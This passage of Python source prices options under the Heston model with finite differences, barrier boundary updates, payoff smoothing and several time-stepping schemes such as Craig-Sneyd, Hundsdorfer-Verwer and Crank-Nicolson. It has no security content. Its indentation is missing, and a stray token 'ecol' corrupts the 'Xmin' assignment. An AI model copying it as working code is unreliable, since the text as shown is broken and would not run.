#plt.spy(A0+A1+A2,markersize=1)
#plt.show()
#ax = plot_coo_matrix(A0+A1+A2)
#ax.figure.show(block=True)
#plt.show(ax.figure)
#raise Error
I = identity(M*L,format="csc")
A0Full = A0.copy()
A1Full = A1.copy()
A2Full = A2.copy()
BC = lil_matrix((L*M,L*M))
#boundary conditions j=0,L-1.
start=time.time()
if useDamping:
A = A0+A1+A2
a = 0.5
Li = I+a*A + BC
lu = sla.splu(Li)
updatePayoffBoundary(F, Sc, B, iBarrier, M,L)
F = lu.solve(F)
updatePayoffBoundary(F, Sc, B, iBarrier, M,L)
F = lu.solve(F)
N -= 1
if method == "CS":
a = 0.5
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicit(Y0, S, B, iBarrier, M,L)
Y0r = Y0+a*A1*F
updatePayoffBoundary(Y0r, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0r)
Y1r = Y1+a*A2*F
updatePayoffBoundary(Y1r, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1r)
Y0t = Y0 - 0.5*(A0*Y2-A0*F)
Y0r = Y0t+a*A1*F
updatePayoffBoundary(Y0r, Sc, B, iBarrier, M,L)
Y1t = lu1.solve(Y0r)
Y1r = Y1t+a*A2*F
updatePayoffBoundary(Y1r, Sc, B, iBarrier, M,L)
Y2t = lu2.solve(Y1r)
F = Y2t
elif method == "HW":
a = 0.5+math.sqrt(3)/6
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicit(Y0, S, B, iBarrier, M,L)
Y0 = Y0+a*A1*F
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*F
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
#updatePayoffExplicit(Y2, S, B, iBarrier, M,L)
Y0 = F-0.5*(A0+A1+A2)*(F+Y2)
Y0 = Y0+a*A1*Y2
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*Y2
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
F = Y2
elif method == "DO":
a = 0.5
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
updatePayoffExplicit(F, Sc, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2+BC)*F #explicit
updatePayoffExplicit(Y0, Sc, B, iBarrier, M,L)
Y0 = Y0+a*A1*F
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*F
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
F = Y2
elif method == "LODLS":
a = 1 - math.sqrt(2)/2
Li = I+a*A1
lu = sla.splu(Li)
lu2 = sla.splu(I+a*(A0+A2))
for i in range(N):
F1 = lu.solve(F)
F1t = lu2.solve(F1)
F2 = lu.solve(F1t)
F2t = lu2.solve(F2)
F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F1t
#F = np.maximum(F,0)
elif method == "CN":
A = A0+A1+A2
a = 0.5
Li = I+a*A+BC
Le = I-(1-a)*A
lu = sla.splu(Li)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M, L)
F1 = Le*F
updatePayoffBoundary(F1, Sc, B, iBarrier, M,L)
F = lu.solve(F1)
elif method =="LS":
a = 1 - math.sqrt(2)/2
if not B == 0:
for i in range(N):
ti = T*(N-i-1)/N
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+a*A+BC #FIXME compute A from 0, then update rows according to BC as iBarrier moves!
lu = sla.splu(Li)
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F1 = lu.solve(F)
updatePayoffBoundary(F1, Sc, B,iBarrier,M,L)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
#F = np.maximum(F,0)
else:
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+a*A+BC #FIXME compute A from 0, then update rows according to BC as iBarrier moves!
lu = sla.splu(Li)
for i in range(N):
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F1 = lu.solve(F)
updatePayoffBoundary(F1, Sc, B,iBarrier,M,L)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
elif method == "O4":
A = A0+A1+A2
# a1 = 1.0/(6 - 2*math.sqrt(6))
# a2 = 1.0/(2*(3+math.sqrt(6)))
# lu1 = sla.splu(I + a1*A+BC)
# lu2 = sla.splu(I + a2*A+BC)
Asq = A*A
Li0 = I+A+0.5*Asq+1.0/6*A*Asq
lu0 = sla.splu(Li0+BC)
lu = sla.splu(I+0.5*A+1.0/12*Asq+BC)
#F0 = F - A*F + 0.5*A*A*F - 1.0/6* A*A*A*F
#F1 = F0 - A*F0 + 0.5*A*A*F0 - 1.0/6* A*A*A*F0# A*F0 + 0.5*A*(I-A/3)*(A*F0)
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F0 = lu0.solve(F)
updatePayoffBoundary(F0, Sc, B,iBarrier,M,L)
F1 = lu0.solve(F0)
F = F1
for i in range(N-2):
Fr= F-0.5*A*(F - 1.0/6*A*F)
updatePayoffBoundary(Fr, Sc, B,iBarrier,M,L)
# F1 = lu2.solve(Fr)
# updatePayoffBoundary(F1, S, B,iBarrier,M,L)
F = lu.solve(Fr)
else:
if not B == 0:
for i in range(N):
ti = T*(N-i-1)/N
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+A+BC
lu = sla.splu(Li)
updatePayoffBoundary(F,Sc,B,iBarrier,M,L)
F = lu.solve(F)
else:
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+A+BC
lu = sla.splu(Li)
for i in range(N):
updatePayoffBoundary(F,Sc,B,iBarrier,M,L)
F = lu.solve(F)
end=time.time()
#F[50+4*M]
#S0=101.52
Payoff = F.reshape(L,M)
#print("Payoff V=0",Payoff[0])
jv0 = np.searchsorted(V,v0)
#print("Payoff V=V0",V[jv0])
#for (si,pi) in zip(S, Payoff[jv0]):
# print(si, pi)
#
# # istrike =np.searchsorted(S,K)
# # print("Payoff S=K",S[istrike])
# # for (vi,pi) in zip(V, Payoff[:][istrike]):
# # print(vi, pi)
# plt.grid(True)
# plt.plot(S[:30], Payoff[jv0][:30])
# #plt.plot(V,Payoff[:][istrike])
# plt.yscale('symlog',linthreshy=1e-6)
# plt.show()
#Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
Payoffi = interpolate.RectBivariateSpline(V,S,Payoff,kx=3,ky=3,s=0)
maxError = 0.0
# Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
#print("spot method n m l price delta gamma error")
for spot,refPrice in zip(spotArray,priceArray):
price = Payoffi(v0,spot)[0][0]
delta = Payoffi(v0,spot,dy=1)[0][0]
gamma = Payoffi(v0,spot,dy=2)[0][0]
error = price -refPrice
if abs(error) > maxError:
maxError = abs(error)
# print(spot,method,N,M,L, price, delta,gamma,error)
if not B==0:
print(method,N,M,L,Payoffi(v0,K)[0][0],end-start)
else:
print(method,N,M,L,maxError,end-start)
def updateSystemBoundary(L,M,iBarrier,Sc,B,A0,A1,A2,BC):
# print(type(A0),type(A1),type(A2))
for i in range(1,iBarrier):
j=0
A2[i+j*M,i+(j+1)*M] =0
A2[i+j*M,i+j*M] = 0
j=L-1
A2[i+j*M,i+(j-1)*M] =0
A2[i+j*M,i+j*M] = 0
for j in range(1,L-1):
A2[i+j*M,i+(j+1)*M] =0
A2[i+j*M,i+j*M] = 0
A2[i+j*M,i+(j-1)*M] =0
A0[i+j*M,i+1+(j+1)*M]= 0
A0[i+j*M,i+1+(j-1)*M]=0
A0[i+j*M,i-1+(j+1)*M]=0
A0[i+j*M,i-1+(j-1)*M]=0
A0[i+j*M,i+(j)*M]=0
A0[i+j*M,i+(j)*M]=0
for j in range(0,L):
A1[i+j*M,(i+1)+j*M] = 0
A1[i+j*M,i+j*M] = 0
A1[i+j*M,(i-1)+j*M] = 0
updateBoundaryCondition(L,M,iBarrier,Sc,B,BC)
def updateBoundaryCondition(L,M,iBarrier, Sc, B, BC):
for j in range(L):
BC[iBarrier-1+j*M,iBarrier-1+j*M]=(Sc[iBarrier]-B)/(Sc[iBarrier]-Sc[iBarrier-1])-1
BC[iBarrier-1+j*M,iBarrier+j*M]=(B-Sc[iBarrier-1])/(Sc[iBarrier]-Sc[iBarrier-1])
def priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, cFunc, K, B, N, M, L):
isCall = False #True
method = "LS" # "LS","CN","DO"
smoothing = "KreissF" #"Kreiss","Averaging","None"
useDamping = False
useLinear = False
useVLinear = False #False
useExponentialFitting = True
upwindingThreshold = 1.0
epsilon = 1e-3
dChi = 4*kappa*theta/(sigma*sigma)
chiN = 4*kappa*math.exp(-kappa*T)/(sigma*sigma*(1-math.exp(-kappa*T)))
vmax = ncx2.ppf((1-epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
vmin = ncx2.ppf((epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
#print("vmax",vmin,vmax, 10*v0)
vmin = max(1e-4,vmin)
V = np.arange(L)*(vmax/(L-1))
W = V
hl = W[1]-W[0]
JV=np.ones(L)
JVm=np.ones(L)
if not useVLinear:
vscale = v0*2
u = np.linspace(0,1,L) #1e-4,math.sqrt(vmax),L) #ideally, concentrated around v0: V=sinh((w-w0)/c). w unif
c1 = math.asinh((vmin-v0)/vscale)
c2 = math.asinh((vmax-v0)/vscale)
V = v0 + vscale*np.sinh((c2-c1)*u+c1)
hl = u[1]-u[0]
JV = vscale*(c2-c1)* np.cosh((c2-c1)*u+c1)
JVm = vscale*(c2-c1)* np.cosh((c2-c1)*(u-hl/2)+c1)
Xspan = 4*math.sqrt(theta*T)
logK = math.log(K) #f(e^zi) = K
Kinv = cFunc.solve(K)
logKinv = math.log(Kinv)
ecol Xmin = logK - Xspan + (r-q)*T - 0.5*v0*T
Xmax = logK + Xspan + (r-q)*T - 0.5*v0*T
# Xmin = math.log(cFunc.solve(math.exp(Xmin)))
# Xmax = math.log(cFunc.solve(math.exp(Xmax)))
# print(Xmin,Xmax,logKinv)
X = np.linspace(Xmin,Xmax,M)
hm = X[1]-X[0]
S = np.exp(X)
J=np.ones(M)
Jm=np.ones(M)
#S lin
if useLinear:
#S=np.linspace(0,K*4,M)
#X-=hm/2
S=np.exp(X)
J=np.ones(M)
Jm=np.ones(M)
#V
cFuncEval = np.vectorize(cFunc.evaluate)
Sc = np.array([cFunc.evaluate(T,Si) for Si in S])
# plt.grid(True)
# # plt.plot(S,Sc)
# plt.plot(S, [(cFunc.evaluate(Si+1e-5)-cFunc.evaluate(Si))/1e-5 for Si in S])
# plt.show()
if isCall:
F0 = np.maximum(Sc-K,0)
else:
F0 = np.maximum(K-Sc,0)
F0smooth = np.array(F0,copy=True)
dIndices = set()
alldisc = cFunc.X + [Kinv]
for xd in (alldisc):
logxd = math.log(xd)
ixd = np.searchsorted(X,logxd) # S[i-1]<K<=S[i]
dIndices.add(ixd)
if ixd > 0:
dIndices.add(ixd-1)
#indices = range(M)
#print(K, Kinv, cFunc.evaluate(Kinv)-K)
#raise Error
if smoothing == "Averaging":
iStrike = np.searchsorted(X,logKinv) # S[i-1]<K<=S[i]
if logKinv < (X[iStrike]+X[iStrike-1])/2:
iStrike -= 1
payoff1 = lambda v: cFunc.evaluate(T,math.exp(v))-K
payoff1 = np.vectorize(payoff1)
value = 0
if isCall:
a = (X[iStrike]+X[iStrike+1])/2
value = integrate.quad( payoff1, logKinv, a)
else:
a = (X[iStrike]+X[iStrike-1])/2 # int a,lnK K-eX dX = K(a-lnK)+ea-K
value = integrate.quad( payoff1, logKinv, a)
h = (X[iStrike+1]-X[iStrike-1])/2
F0smooth[iStrike] = value[0]/h
elif smoothing == "Kreiss":
iStrike = np.searchsorted(X,logKinv) # S[i-1]<K<=S[i]
xmk = X[iStrike]
h = (X[iStrike+1]-X[iStrike-1])/2
payoff1 = lambda v: (cFunc.evaluate(T,math.exp(xmk-v))-K)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[iStrike]
if isCall:
a = (X[iStrike]+X[iStrike+1])/2
#logKinv>0
value1 = integrate.quad( payoff1, 0,xmk-logKinv)
value0 = integrate.quad( payoff1, -h, 0)
value = (value0[0]+value1[0]) /h
F0smooth[iStrike] = value
iStrike -= 1
xmk = X[iStrike]
payoff1 = lambda v: (cFunc.evaluate(T,math.exp(xmk-v))-K)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[iStrike]
if isCall:
a = (X[iStrike]+X[iStrike+1])/2
#logKinv<0
value1 = integrate.quad( payoff1, -h,xmk-logKinv)
value = (value1[0]) /h
F0smooth[iStrike] = value
elif smoothing=="KreissF":
for i in (dIndices):
xmk = X[i]
h = hm #(X[i+1]-X[i-1])/2
sign = 1
if not isCall:
sign=-1
payoff1 = lambda v: max(sign*(cFunc.evaluate(T,math.exp(xmk-v))-K),0)*(1-abs(v)/h)
payoff1 = np.vectorize(payoff1)
value = F0smooth[i]
value1 = integrate.quad( payoff1, 0,h)
value0 = integrate.quad( payoff1, -h, 0)
value = (value0[0]+value1[0]) /h
#print("new value",value,Xi,iXi)
F0smooth[i] = value
elif smoothing=="KreissF4":
for i in range(M):
xmk = X[i]
h = hm #(X[i+1]-X[i-1])/2
sign = 1
if not isCall:
sign=-1
# f4 = @(x) (1/36)*(1/2)*...
# ( +56*x.^3.*sign(x) +(x-3).^3.*(-sign(x-3)) +12*(x-2).^3.*sign(x-2) -39*(x-1).^3.*sign(x-1) -39*(x+1).^3.*sign(x+1) +12*(x+2).^3.*sign(x+2) -(x+3).^3.*sign(x+3));
payoff1 = lambda v: max(sign*(cFunc.evaluate(T,math.exp(xmk-v))-K),0)*1.0/72*(56*pow(abs(v/h),3) -pow(abs(v/h-3),3) +12*pow(abs(v/h-2),3) -39*pow(abs(v/h-1),3) -39*pow(abs(v/h+1),3) +12*pow(abs(v/h+2),3) -pow(abs(v/h+3),3))
payoff1 = np.vectorize(payoff1)
value = F0smooth[i]
value1 = integrate.quad( payoff1, -3*h,3*h)
# value0 = integrate.quad( payoff1, -3*h, 0)
value = (value1[0]) /h
#print("new value",value,Xi,iXi)
F0smooth[i] = value
#print("F0smooth",F0smooth)
iBarrier = 1
if not B == 0:
iBarrier = np.searchsorted(S,B) #S[i-1]<B<=S[i]
F = []
for j in range(L):
F = np.append(F,F0smooth)
dt = -T/N
A01 = lil_matrix((L*M,L*M))
A02 = lil_matrix((L*M,L*M))
A1 = lil_matrix((L*M,L*M))
A2 = lil_matrix((L*M,L*M))
BC = lil_matrix((L*M,L*M))
#boundary conditions, 0,0, 0,L-1, M-1,0, M-1,L-1.
i=0
j=0
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+1+(j+1)*M]+=rij
#A[i+j*M,i+1+(j)*M]+=-rij
#A[i+j*M,i+(j+1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
i=0
j=L-1
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += rij
#A[i+j*M,i+1+(j-1)*M]+=-rij
#A[i+j*M,i+1+(j)*M]+=rij
#A[i+j*M,i+(j-1)*M]+=rij
#A[i+j*M,i+(j)*M]+=-rij
i=M-1
j=L-1
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
i=M-1
j=0
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j+1)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j+1)*M]+=-rij
#A[i+j*M,i-1+(j)*M]+=rij
#A[i+j*M,i+(j+1)*M]+=rij
#A[i+j*M,i+(j)*M]+=-rij
#boundary conditions j=0,L-1.
for i in range(1,M-1):
j=0
svi = V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
drifti = (r-q-0.5*V[j])
if useExponentialFitting:
if svi > 0 and abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
#svi = svi +0.5*abs(drifti)*hm
svi = svi/(2*hm*hm)
A1[i+j*M,(i+1)+j*M] += dt*(svi/Jm[i+1]+drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*(1.0/Jm[i+1]+1.0/Jm[i])-r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(svi/Jm[i]-drifti/(2*J[i]*hm))
A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
#A[i+j*M,i+1+(j+1)*M]+=rij
#A[i+j*M,i+1+(j)*M]+=-rij
#A[i+j*M,i+(j+1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
j=L-1
svi = V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
drifti = (r-q-0.5*V[j])
if useExponentialFitting:
if svi > 0 and abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
#svi = svi +0.5*abs(drifti)*hm
svi = svi/(2*hm*hm)
rij = dt*rho*sigma*V[j]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i-1)+j*M] += dt*(svi/Jm[i]-drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*(1.0/Jm[i+1]+1.0/Jm[i])-r*0.5)
A1[i+j*M,(i+1)+j*M] += dt*(svi/Jm[i+1]+drifti/(2*J[i]*hm))
A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
A2[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=rij
for j in range(1,L-1):
#boundary conditions i=0,M-1.
i=0
#rij = dt*rho*sigma*V[j]*S[i]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*(-(r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
#A2[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A0[i+j*M,i+1+(j+1)*M]+=rij
#A0[i+j*M,i+1+(j)*M]+=-rij
#A0[i+j*M,i+(j+1)*M]+=-rij
#A0[i+j*M,i+(j)*M]+=rij
i=M-1
A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-r*0.5)
A1[i+j*M,(i)+j*M] += dt*((r-q)/(J[i]*hm))
A2[i+j*M,i+j*M] += dt*(-r*0.5)
#A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
#A[i+j*M,i-1+(j-1)*M]+=rij
#A[i+j*M,i-1+(j)*M]+=-rij
#A[i+j*M,i+(j-1)*M]+=-rij
#A[i+j*M,i+(j)*M]+=+rij
for i in range(1,M-1):
svi = V[j]/(J[i]) #J[j] = Jacobian(X_j), Jm[j]=Jacobian(Xj-hm/2), S[j]=S(Xj)
svj = sigma*sigma*V[j]/(JV[j])
drifti = (r-q-0.5*V[j])
driftj = kappa*(theta-V[j])
if useExponentialFitting:
if abs(drifti*hm/svi) > upwindingThreshold:
svi = drifti*hm/math.tanh(drifti*hm/svi)
# svi = svi +0.5*abs(drifti)*hm
if driftj != 0 and abs(driftj*hl/svj) > 1.0:
# svj = svj +0.5*abs(driftj)*hl
svj = driftj*hl/math.tanh(driftj*hl/svj)
rij = dt*0.25*rho*sigma*V[j]/(JV[j]*J[i]*hl*hm)
A1[i+j*M,(i+1)+j*M] += dt*(0.5*svi/(hm*hm*Jm[i+1])+drifti/(2*J[i]*hm))
A1[i+j*M,i+j*M] += dt*(-svi*0.5/(hm*hm)*(1.0/Jm[i+1]+1.0/Jm[i]) -r*0.5)
A1[i+j*M,(i-1)+j*M] += dt*(0.5*svi/(hm*hm*Jm[i])-drifti/(2*J[i]*hm))
A2[i+j*M,i+(j+1)*M] += dt*(0.5*svj/(hl*hl*JVm[j+1])+driftj/(2*JV[j]*hl))
A2[i+j*M,i+j*M] += dt*(-r*0.5-svj*0.5/(hl*hl)*(1.0/JVm[j+1]+1.0/JVm[j]))
A2[i+j*M,i+(j-1)*M] += dt*(svj*0.5/(JVm[j]*hl*hl)-driftj/(2*JV[j]*hl))
A01[i+j*M,i+1+(j+1)*M]+= rij
A02[i+j*M,i+1+(j-1)*M]+=-rij
A02[i+j*M,i-1+(j+1)*M]+=-rij
A01[i+j*M,i-1+(j-1)*M]+=rij
A01[i+j*M,i+(j)*M]+=-2*rij
A02[i+j*M,i+(j)*M]+=2*rij
A0 = (A01+A02).tolil()
A0Full=A0.copy()
A1Full=A1.copy()
A2Full=A2.copy()
A1tri, A2tri, indices, indicesInv = createTridiagonalIndices(M,L)
A1tri[1,:] = A1.diagonal(k=0)
A1tri[-1,:-1] = A1.diagonal(k=-1)
A1tri[0,1:] = A1.diagonal(k=1)
A2tri[1,:] = A2.diagonal(k=0)[indicesInv]
A2i = A2[:,indicesInv]
A2i = A2i[indicesInv,:]
#print("size",A2i.shape)
A2tri[-1,:-1] = A2i.diagonal(k=-1)
A2tri[0,1:] = A2i.diagonal(k=1)
#print((A0+A1+A2).shape)
# print((A0+A1+A2)[:,1000].getnnz())
#plt.spy(A0+A1+A2,markersize=1)
#plt.show()
#raise Error
I = identity(M*L,format="csc")
start=time.time()
if useDamping:
A = A0+A1+A2
a = 0.5
Li = I+a*A + BC
lu = sla.splu(Li)
updatePayoffBoundary(F, Sc, B, iBarrier, M,L)
F = lu.solve(F)
updatePayoffBoundary(F, Sc, B, iBarrier, M,L)
F = lu.solve(F)
N -= 1
if method == "CS":
a = 0.5
if B == 0:
craigSneydBanded(N, F, I, A0, A1, A2,A1tri,A2tri, indices, indicesInv)
else:
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicit(Y0, S, B, iBarrier, M,L)
Y0r = Y0+a*A1*F
updatePayoffBoundary(Y0r, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0r)
Y1r = Y1+a*A2*F
updatePayoffBoundary(Y1r, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1r)
Y0t = Y0 - 0.5*(A0*Y2-A0*F)
Y0r = Y0t+a*A1*F
updatePayoffBoundary(Y0r, Sc, B, iBarrier, M,L)
Y1t = lu1.solve(Y0r)
Y1r = Y1t+a*A2*F
updatePayoffBoundary(Y1r, Sc, B, iBarrier, M,L)
Y2t = lu2.solve(Y1r)
F = Y2t
elif method == "HV":
a = 0.5+math.sqrt(3)/6
if B == 0:
F = hundsdorferVerwerBanded(N, F, I, A0, A1, A2,A1tri,A2tri, indices, indicesInv)
else:
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2)*F #explicit
#updatePayoffExplicit(Y0, S, B, iBarrier, M,L)
Y0 = Y0+a*A1*F
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*F
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
#updatePayoffExplicit(Y2, S, B, iBarrier, M,L)
Y0 = F-0.5*(A0+A1+A2)*(F+Y2)
Y0 = Y0+a*A1*Y2
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*Y2
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
F = Y2
elif method == "DO":
a = 0.5
lu1 = sla.splu(I+a*A1+BC)
lu2 = sla.splu(I+a*A2+BC)
for i in range(N):
updatePayoffExplicit(F, Sc, B, iBarrier, M,L)
Y0 = (I-A0-A1-A2+BC)*F #explicit
updatePayoffExplicit(Y0, Sc, B, iBarrier, M,L)
Y0 = Y0+a*A1*F
updatePayoffBoundary(Y0, Sc, B, iBarrier, M,L)
Y1 = lu1.solve(Y0)
Y1 = Y1+a*A2*F
updatePayoffBoundary(Y1, Sc, B, iBarrier, M,L)
Y2 = lu2.solve(Y1)
F = Y2
elif method == "LODLS":
a = 1 - math.sqrt(2)/2
Li = I+a*A1
lu = sla.splu(Li)
lu2 = sla.splu(I+a*(A0+A2))
for i in range(N):
F1 = lu.solve(F)
F1t = lu2.solve(F1)
F2 = lu.solve(F1t)
F2t = lu2.solve(F2)
F = (1+math.sqrt(2))*F2t - math.sqrt(2)*F1t
#F = np.maximum(F,0)
elif method == "CN":
A = A0+A1+A2
a = 0.5
Li = I+a*A+BC
Le = I-(1-a)*A
lu = sla.splu(Li)
for i in range(N):
#updatePayoffExplicit(F, S, B, iBarrier, M, L)
F1 = Le*F
updatePayoffBoundary(F1, Sc, B, iBarrier, M,L)
F = lu.solve(F1)
elif method =="LS":
a = 1 - math.sqrt(2)/2
if B==0:
A = A0+A1+A2
Li = I+a*A+BC
lu = sla.splu(Li)
for i in range(N):
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F1 = lu.solve(F)
updatePayoffBoundary(F1, Sc, B,iBarrier,M,L)
F2 = lu.solve(F1)
F = (1+math.sqrt(2))*F2 - math.sqrt(2)*F1
#F = np.maximum(F,0)
else:
for i in range(N):
ti = T*(N-i)/N
ti += a*dt
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
